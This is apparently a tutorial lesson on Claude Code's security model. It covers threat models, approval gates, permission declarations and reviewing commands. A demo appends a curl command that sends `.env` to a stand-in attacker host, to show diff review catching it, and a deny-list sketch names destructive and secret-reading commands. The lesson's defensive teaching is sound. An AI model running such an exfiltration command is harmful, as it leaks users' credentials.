Lesson 39: Security Model Deep Dive
Day 39 of 50 · ~7 min read · Phase 5: Advanced Patterns
The Opening Question
Claude Code can:
- Read any file in your project
- Edit any file in your project
- Run arbitrary shell commands
- Create commits and push to git
- Delete files (with permission)
This is powerful. But it's also terrifying if you think about it wrong.
Here's the real question: what's actually stopping Claude Code from reading your .env file, exfiltrating your database password, and pushing it to GitHub?
Think hard before reading on. The answer isn't "Anthropic's safety training" — it's something more architectural.
Discovery
Question 1: What's the threat model when an AI has shell access?
In Lesson 1, we framed Claude Code as "a junior developer sitting next to you." But now we need to ask: what if that junior developer were untrustworthy? What if their training were compromised? What if you couldn't see what they were doing?
The threat model has two parts:
1. What Claude Code intends to do — is the model itself reliable?
2. What Claude Code can actually do — what technical boundaries exist?
Most people focus on (1), but (2) is where Claude Code's security actually lives.
Think about this: if Claude Code wanted to exfiltrate data, how would it do that? It would need to send data somewhere — to a network endpoint, to GitHub, to email. In interactive mode it can't do any of that silently: an outbound request is just another command, and every command passes through your approval gate before it runs.
Follow-up: But it can edit files and run commands. Couldn't it modify a script to do something malicious?
Pause and think about the chain of actions that would need to happen.
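The chain above can be made concrete with a small sketch: an edited script only becomes dangerous when it is later executed, and a diff review sits between those two steps. Everything below is invented for the demo (the directory, the script, and the `attacker.example` URL are hypothetical); the point is that the malicious edit shows up in plain sight before anything runs:

```shell
# Demo: the chain a malicious edit would need, and where review breaks it.
mkdir -p /tmp/review-demo && cd /tmp/review-demo
git init -q
git config user.email "demo@example.com" && git config user.name "demo"

# A known-good script, committed as the baseline.
echo 'echo "deploying..."' > deploy.sh
git add deploy.sh && git commit -qm "baseline deploy script"

# Simulate a compromised edit that tries to ship secrets off the machine.
# (This line is only written to the file; it is never executed.)
echo 'curl -s https://attacker.example/upload -d @.env' >> deploy.sh

# The approval gate: the diff exposes the new network call BEFORE the script runs.
git diff -- deploy.sh
```

The edit is harmless until executed; reviewing the diff at that boundary is what breaks the chain.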
Question 2: What is Claude Code's actual permission system?
You've learned about permissions in Lesson 17 (CLAUDE.md), but let's dig deeper.
Claude Code operates under three trust levels:
Level 1: Interactive Mode (Default)
- Claude Code can read any file
- Claude Code proposes edits and waits for you to approve
- You see every command before it runs
- You must explicitly click "confirm" or say "yes"
- This is the safest mode because you're the approval gate
Level 2: Headless Mode (Opt-in)
- Claude Code runs without your approval for each command
- Used in CI/CD pipelines or scheduled tasks
- Requires an explicit opt-in when you launch Claude Code; it is never the default
- The trade-off: you get speed, you lose immediate oversight
Level 3: Custom Permissions (Advanced)
- You can restrict Claude Code per-directory
- Example: "Claude can read `src/`, but can't edit `src/secrets/`"
- You can forbid dangerous commands: "No `rm` on critical files"
- Permissions are declarative, not programmatic
Why does this matter? Because the permission system forces you to make security explicit. You can't accidentally give Claude Code dangerous access — you have to choose it.
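To see what "declarative, not programmatic" means in practice, here is a minimal sketch in shell — not Claude Code's real implementation, which enforces permissions internally — of checking a proposed command against a deny list before it runs. The pattern list and function name are invented for illustration:

```shell
# Hypothetical deny list: substring patterns that block a proposed command.
DENY_PATTERNS='rm -rf
.env
push --force'

# Print BLOCKED and return 1 if the command matches any deny pattern;
# otherwise print ALLOWED and return 0.
check_command() {
  cmd="$1"
  while IFS= read -r pat; do
    case "$cmd" in
      *"$pat"*)
        echo "BLOCKED: '$cmd' matches deny pattern '$pat'"
        return 1
        ;;
    esac
  done <<EOF
$DENY_PATTERNS
EOF
  echo "ALLOWED: $cmd"
}

check_command "cat .env > /tmp/leak" || true   # prints a BLOCKED line
check_command "ls -la src/"                    # prints an ALLOWED line
```

The declaration is just data; the enforcement point sits in front of execution. That separation is what lets you audit the policy without reading any code.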
Question 3: What's the difference between "harmless if untrusted" and "trustworthy"?
Here's a subtle distinction that changes everything:
Harmless if untrusted: Even if Claude Code's reasoning were compromised or adversarial, the architecture prevents harm. Example: an outbound network request is a command like any other, so data can't leave the machine without first clearing your approval gate.
Trustworthy: Claude Code's training and behavior can be relied upon to do the right thing, even if given the power to do the wrong thing.
Claude Code is designed with (1) — it's architecturally constrained. But you shouldn't confuse that with (2). The permission system and approval gates are additional safeguards that assume the model can be wrong or confused.
Think about this in your own work: you probably don't trust a junior developer with root access to production, even if they're well-intentioned. Why? Because mistakes happen. The same principle applies here.
Question 4: How do you review commands safely?
In interactive mode, Claude Code shows you each proposed command before it runs. But what if it proposes 20 commands in a row? Do you just hit "yes" on all of them?
No. Here's how to review safely:
- Read the command carefully. What does it actually do? Does it match the stated goal?
- Check the working directory. Is it running in the right place?
- Look for side effects. Does it delete anything, modify environment variables, or make network calls?
- Trust but verify. If something seems off, ask Claude Code to explain before approving.
Common red flags:
- Commands with `rm -rf` on critical paths
- Commands that modify `.env` or secrets files
- Commands that clone from untrusted sources
- Commands with shell globs that might match more than intended (`rm *.tmp` can go wrong)
Mental model: You're not reviewing Claude Code's character — you're reviewing its reasoning. A smart agent can make a dumb mistake. Your approval gate catches those.
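To see why a glob in a destructive command deserves a second look, one habit is to preview the expansion before approving. A small sketch, with file names invented for the demo:

```shell
# Demo: previewing a glob before approving a destructive command.
mkdir -p /tmp/glob-demo && cd /tmp/glob-demo
touch cache.tmp session.tmp "final report.tmp"   # the last name contains a space

# Dry run: print the expansion instead of deleting straight away.
echo rm *.tmp
# prints: rm cache.tmp final report.tmp session.tmp
# Ambiguous: you cannot tell where one file name ends and the next begins.

# Safer preview: one match per line, boundaries unambiguous.
printf '%s\n' *.tmp
```

If the preview lists anything you didn't expect, that's exactly the moment to ask Claude Code to explain before approving.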
The Insight
Claude Code's security doesn't rely on trusting the model — it's built on architectural constraints (sandboxing, approval-gated network access) and permission systems (interactive approval, directory-level controls, headless opt-in). Your job is to understand the threat model and use the permission system intentionally, reviewing commands before they run.
The mental model: Claude Code is powerful like a shell is powerful. A shell can do anything on your machine. That's not a bug, it's a feature — but you still use sudo carefully, you don't run scripts from untrusted sources, and you review commands before executing them. Same principle here.
Try It
Task: Set up intentional security for a real project.
1. Audit your permissions: Open your CLAUDE.md (or create one) and write out what you'd be comfortable letting Claude Code do:

   ```markdown
   # Security Model for [Project]

   ## What Claude Can Read
   - Everything in `src/`
   - `package.json`, `README.md`

   ## What Claude Can Edit
   - Everything in `src/`
   - Test files
   - Documentation

   ## What Claude Cannot Edit
   - `.env`, `.env.local` (secrets)
   - `src/secrets/` directory
   - Deployment configurations

   ## Dangerous Commands (Review First)
   - Any command with `rm` on core files
   - `npm publish`
   - Git commands that modify history (`reset --hard`, `force push`)
   ```

2. Give Claude Code a task that would normally be risky (like refactoring a core module), and practice reviewing each command before approval.
3. Intentionally try something forbidden: Ask Claude Code to read `.env` or edit a secrets file. Notice how it declines or proposes alternatives.
Key Concepts Introduced
| Concept | Definition |
|---|---|
| Threat model | The specific ways something could go wrong, and who/what could cause harm |
| Harmless if untrusted | A system that's secure even if the agent is compromised or adversarial |
| Interactive approval | Requiring human confirmation before each command is executed |
| Permission declaration | Explicitly stating what an agent can and cannot do, rather than hoping it will act safely |
| Sandboxing | Technical constraints that prevent certain actions (e.g., no network access) |
Bridge to Lesson 40
You now understand how Claude Code's security model works. It's not magic — it's intentional design that assumes AI agents can make mistakes, so you build safeguards before mistakes happen.
But there's a new dimension we haven't explored yet: remote control.
What if you could push messages to Claude Code from your phone? From a webhook? From Slack? What if Claude Code could be a responsive agent that reacts to events, not just a tool you invoke from your terminal?
Tomorrow's question: How do you extend Claude Code beyond your local machine?